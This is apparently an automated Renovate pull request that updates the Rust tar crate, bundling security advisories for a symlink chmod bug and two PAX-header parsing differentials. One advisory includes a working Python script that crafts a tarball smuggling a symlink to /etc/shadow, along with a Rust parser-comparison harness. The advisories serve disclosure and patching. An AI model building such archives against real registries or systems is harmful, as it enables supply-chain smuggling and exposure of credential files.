chore(deps): update rust crate tar to v0.4.46 [security]

[renovate]

This PR contains the following updates:

Package	Type	Update	Change
tar	dev-dependencies	patch	0.4.44 → 0.4.46
tar	dependencies	patch	0.4.44 → 0.4.46

---

tar-rs unpack_in can chmod arbitrary directories by following symlinks

CVE-2026-33056 / GHSA-j4xf-2g29-59ph

More information

Details

Summary

When unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory — and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root.

Reproducer

A malicious tarball contains two entries: (1) a symlink foo pointing to an arbitrary external directory, and (2) a directory entry foo/. (or just foo). When unpacked, create_dir("foo") fails with EEXIST because the symlink is already on disk. The fs::metadata() check then follows the symlink, sees a directory at the target, and allows processing to continue. The directory entry's mode bits are then applied via chmod, which also follows the symlink — modifying the permissions of the external target directory.

Fix

The fix is very simple, we now use fs::symlink_metadata() in unpack_dir, so symlinks are detected and rejected rather than followed.

Credit

This issue was reported by @​xokdvium - thank you!

Severity

• CVSS Score: 5.1 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph
• https://nvd.nist.gov/vuln/detail/CVE-2026-33056
• https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446
• https://rustsec.org/advisories/RUSTSEC-2026-0067.html
• https://github.com/advisories/GHSA-j4xf-2g29-59ph

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

tar-rs incorrectly ignores PAX size headers if header size is nonzero

CVE-2026-33055 / GHSA-gchp-q4r4-x4ff

More information

Details

Summary

As part of CVE-2025-62518 the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.

However, it was missed at the time that this project (the original Rust tar crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.

The problem here is that any discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.

In this case, the tar-rs (Rust tar) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go archive/tar) unconditionally use the PAX size override.

Details

https://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600
https://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344

PoC

(originally posted by https://github.com/xokdvium)

I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:

It seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by astral-tokio-tar but not by tar-rs.

https://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600
https://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344

#!/usr/bin/env python3
B = 512

def pad(d):
    r = len(d) % B
    return d + b"\0" * (B - r) if r else d

def hdr(name, size, typ=b"0", link=b""):
    h = bytearray(B)
    h[0 : len(name)] = name
    h[100:107] = b"0000644"
    h[108:115] = h[116:123] = b"0001000"
    h[124:135] = f"{size:011o}".encode()
    h[136:147] = b"00000000000"
    h[148:156] = b"        "
    h[156:157] = typ
    if link:
        h[157 : 157 + len(link)] = link
    h[257:263] = b"ustar\x00"
    h[263:265] = b"00"
    h[148:155] = f"{sum(h):06o}\x00".encode()
    return bytes(h)

INFLATED = 2048
pax_rec = b"13 size=2048\n"

ar = bytearray()
ar += hdr(b"./PaxHeaders/regular", len(pax_rec), typ=b"x")
ar += pad(pax_rec)

content = b"regular\n"
ar += hdr(b"regular.txt", len(content))
mark = len(ar)
ar += pad(content)

ar += hdr(b"smuggled", 0, typ=b"2", link=b"/etc/shadow")
ar += b"\0" * B * 2

used = len(ar) - mark
if used < INFLATED:
    ar += b"\0" * (((INFLATED - used + B - 1) // B) * B)
ar += b"\0" * B * 2

open("smuggle.tar", "wb").write(bytes(ar))

tar-rs and astral-tokio-tar parse it differently, with astral-tokio-tar skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn't disallow it).

use std::fs;
use std::path::PathBuf;

fn sync_parse(data: &[u8]) {
    println!("tar:");
    let mut ar = tar::Archive::new(data);
    for e in ar.entries().unwrap() {
        let e = e.unwrap();
        let path = e.path().unwrap().to_path_buf();
        let kind = e.header().entry_type();
        let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());
        match link {
            Some(l) => println!("  {:20} {:?} -> {}", path.display(), kind, l.display()),
            None => println!("  {:20} {:?}", path.display(), kind),
        }
    }
    println!();
}

async fn async_parse(data: Vec<u8>) {
    println!("astral-tokio-tar:");
    let mut ar = tokio_tar::Archive::new(data.as_slice());
    let mut entries = ar.entries().unwrap();
    while let Some(e) = tokio_stream::StreamExt::next(&mut entries).await {
        let e = e.unwrap();
        let path = e.path().unwrap().to_path_buf();
        let kind = e.header().entry_type();
        let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());
        match link {
            Some(l) => println!("  {:20} {:?} -> {}", path.display(), kind, l.display()),
            None => println!("  {:20} {:?}", path.display(), kind),
        }
    }
    println!();
}

#[tokio::main]
async fn main() {
    let path = std::env::args().nth(1).unwrap_or("smuggle.tar".into());
    let data = fs::read(&path).unwrap();
    sync_parse(&data);
    async_parse(data).await;
}

tar:
  regular.txt          Regular
  smuggled             Symlink -> /etc/shadow

astral-tokio-tar:
  regular.txt          Regular

Impact

This can affect anything that uses the tar crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses astral-tokio-tar to parse, but cargo uses tar.

Severity

• CVSS Score: 5.1 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff
• https://nvd.nist.gov/vuln/detail/CVE-2026-33055
• https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946
• https://rustsec.org/advisories/RUSTSEC-2026-0068.html
• https://www.cve.org/CVERecord?id=CVE-2025-62518
• https://github.com/composefs/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff
• https://github.com/advisories/GHSA-gchp-q4r4-x4ff

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

tar has a PAX header desynchronization issue

GHSA-3pv8-6f4r-ffg2

More information

Details

Summary

When a tar stream contains multiple "header" entries prior to a file entry, tar-rs applies the PAX header (x) to the next entry in the stream, regardless of type. For example, a stream of x -> L -> file (PAX, GNU longname, file) would result in x's extensions being applied to L rather than to file.

Per POSIX pax, this is incorrect: a PAX header always applies to a file entry, not any intermediary entries. See the "pax Header Block" section for the specific prescription there.

As a result of this, an attacker can contrive a tar containing a sequence of tar headers such that tar-rs applies the PAX header's size extension to the next header in sequence, effectively desynchronizing the stream and enabling tar-rs specific skippage/extraction of members. In other words, a file can be contrived to extract differently on tar-rs than on other tar parsers.

PoC

This tar (zipped for size) demonstrates the desynchronization: with tar tvf:

% tar tvf tests/archives/pax-overrides-extension-header.tar 
----------  0 0      0        2048 Dec 31  1969 longname.txt
----------  0 0      0           0 Dec 31  1969 file_b

with tar-rs:

---- pax_size_does_not_apply_to_extension_headers stdout ----

thread 'pax_size_does_not_apply_to_extension_headers' (250476889) panicked at tests/all.rs:2121:27:
called `Result::unwrap()` on an `Err` value: Custom { kind: Other, error: "numeric field was not a number: AAAAAAAA when getting cksum for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" }
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

In the above case, the PoC is not weaponized, so it jumps into the middle of an entry and subsequently fails the checksum test rather than silently continuing with attacker-controlled archive state.

Impact

This is very similar to GHSA-j5gw-2vrg-8fgx and GHSA-fp55-jw48-c537 in impact -- an attacker can use this to extract (or not extract) files from a tar stream depending on the tar parser used, which in turn can be used to obscure the presence of malicious files.

Severity

Medium

References

• https://github.com/composefs/tar-rs/security/advisories/GHSA-3pv8-6f4r-ffg2
• https://github.com/composefs/tar-rs/pull/454
• https://github.com/composefs/tar-rs/commit/bab14dd84b411ac16ecb56d4f2d2f7bfb88a9838
• https://github.com/composefs/tar-rs/releases/tag/0.4.46
• https://github.com/advisories/GHSA-3pv8-6f4r-ffg2

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

composefs/tar-rs (tar)

v0.4.46

Compare Source

Security

• archive: Fix another PAX header desync (GHSA-3cv2-h65g-fgmm) by @​cgwalters in #​454

See also GHSA-3cv2-h65g-fgmm

Other changes

• ci: Fix and re-enable reverse dependency testing by @​cgwalters in #​444
• Update astral-tokio-tar requirement from 0.5 to 0.6 by @​dependabot[bot] in #​446
• Update some links by @​atouchet in #​445
• Add support of absolute paths by @​zxvfc in #​426
• docs: Expand notes on concurrent mutations and following symlinks by @​cgwalters in #​453
• Update repo links by @​cgwalters in #​451
• ci: Add crates.io trusted publishing workflow by @​cgwalters in #​456
• Release 0.4.46 by @​cgwalters in #​455

New Contributors

• @​dependabot[bot] made their first contribution in #​446
• @​atouchet made their first contribution in #​445
• @​zxvfc made their first contribution in #​426

Full Changelog: composefs/tar-rs@0.4.45...0.4.46

v0.4.45

Compare Source

---

Configuration

📅 Schedule: (in timezone America/Chicago)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.